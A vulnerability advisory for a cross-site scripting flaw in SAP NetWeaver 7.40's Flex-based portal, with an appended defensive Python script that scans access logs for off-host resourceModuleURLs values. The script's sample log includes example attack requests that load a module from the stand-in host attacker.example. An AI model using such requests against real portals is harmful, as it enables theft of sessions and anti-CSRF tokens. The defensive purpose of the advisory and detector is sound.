[ERPSCAN-15-022] SAP NetWeaver 7.4 – XSS

Application: SAP NetWeaver J2EE Engine 7.40
Vendor URL: http://www.sap.com
Bugs: XSS
Reported: 13.07.2015
Vendor response: 24.07.2015
Date of Public Advisory: 09.09.2015
Reference: SAP Security Note 2176785
Authors: Roman Bezhan (ERPScan)

Class: Cross-Site Scripting, XSS [CWE-79]
Impact: information disclosure, theft of anti-CSRF tokens
Remotely Exploitable: Yes
Locally Exploitable: No
CVSS Information
CVSS Base Score: 4.3 / 10
CVSS Base Vector:

AV: Access Vector (Related exploit range) Network (N)
AC: Access Complexity (Required attack complexity) Medium (M)
Au: Authentication (Level of authentication needed to exploit) None (N)
C: Impact to Confidentiality None (N)
I: Impact to Integrity Partial (P)
A: Impact to Availability None (N)

Business Risk
A legitimate user of SAP can insert a malicious script into SAP and gain unauthorized access to the workstation of any user who opens the link.

The attacker can ask victims to visit a malicious site with special content, where external SWF and resourceModuleURLs attributes can force the vulnerable SWF of SAP NetWeaver Portal 7.4 to execute a query in the victim’s context and send private data to the attacker.
1) The attacker can steal anti-CSRF tokens and read private data.
2) The attacker can exploit XSS. Cross-site scripting can be used to steal another user’s authentication information, such as data related to their current session. An attacker who gains access to this data may use it to impersonate the user and access all information with the same rights as the targeted user. If an administrator is impersonated, the security of the application may be fully compromised.

Affected Versions
SAP NetWeaver J2EE Engine 7.40
Other versions are probably affected too, but they were not checked.

Solution
To correct this vulnerability, install SAP Security Note 2176785.

Technical Details
Cross-site scripting vulnerability in the Adobe Flex SDK 3.x and 4.x before 4.6 allows remote attackers to inject arbitrary web script or HTML via vectors related to the loading of modules from different domains.
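The advisory describes the weakness as a Flex SDK application accepting module locations (the resourceModuleURLs flashvar) that point at a foreign domain. A defender who cannot apply the note immediately can at least look for such requests in web-server access logs. The following script is an added example written for this page, not code from ERPScan or SAP: it extracts the resourceModuleURLs parameter from each logged request, flags any module URL whose host is not the portal's own, and runs over a constructed sample of Apache-style "combined" log lines. The SWF path (/placeholder/app.swf), the host names and the client addresses in the sample are placeholders, not values taken from the advisory.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Flashvars honoured by the affected Flex resource-module loader. The advisory names
# resourceModuleURLs; any further parameter names added here get the same check.
SUSPECT_PARAMS = ("resourceModuleURLs",)


def cross_origin_module_urls(request_target, allowed_host):
    """Return every module URL in the request's flashvars that resolves outside allowed_host.

    Relative paths resolve against the portal's own origin and are accepted; an absolute or
    scheme-relative URL whose host differs from allowed_host is reported.
    """
    query = parse_qs(urlsplit(request_target).query)
    offending = []
    for name in SUSPECT_PARAMS:
        for raw_value in query.get(name, []):
            # Flex accepts a comma-separated list; decode once more to catch double encoding.
            for candidate in unquote(raw_value).split(","):
                candidate = candidate.strip()
                if not candidate:
                    continue
                host = urlsplit(candidate).hostname
                if host is not None and host.lower() != allowed_host.lower():
                    offending.append(candidate)
    return offending


# Apache/nginx "combined" access-log format; only the fields this check needs are captured.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def scan_access_log(log_text, allowed_host):
    """Return (client_ip, request_target, offending_urls) for every request that carries
    a cross-origin module URL in one of the suspect flashvars."""
    findings = []
    for line in log_text.splitlines():
        match = LOG_LINE.match(line)
        if not match:
            continue  # not a combined-format line; skip rather than guess
        bad = cross_origin_module_urls(match.group("target"), allowed_host)
        if bad:
            findings.append((match.group("ip"), match.group("target"), bad))
    return findings


# Constructed sample log: paths, hosts and addresses are placeholders, not advisory data.
SAMPLE_LOG = """\
203.0.113.5 - - [09/Sep/2015:10:01:02 +0000] "GET /placeholder/app.swf?resourceModuleURLs=modules/en_US.swf HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
203.0.113.9 - - [09/Sep/2015:10:01:07 +0000] "GET /placeholder/app.swf?resourceModuleURLs=http%3A%2F%2Fattacker.example%2Fm.swf HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
203.0.113.9 - - [09/Sep/2015:10:01:09 +0000] "GET /placeholder/app.swf?resourceModuleURLs=%2F%2Fattacker.example%2Fm.swf,modules/en_US.swf HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
198.51.100.2 - - [09/Sep/2015:10:02:00 +0000] "GET /placeholder/app.swf?resourceModuleURLs=https://portal.example/modules/en_US.swf HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for ip, target, bad in scan_access_log(SAMPLE_LOG, "portal.example"):
        print(f"{ip} requested {target} with cross-origin modules: {bad}")
```

Run against a real log, the allowed host is the portal's external host name and the findings are a starting point for review, not proof of exploitation: a same-host module URL (the fourth sample line) is accepted, and the check does not see POST bodies or requests that never reached the web server log.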
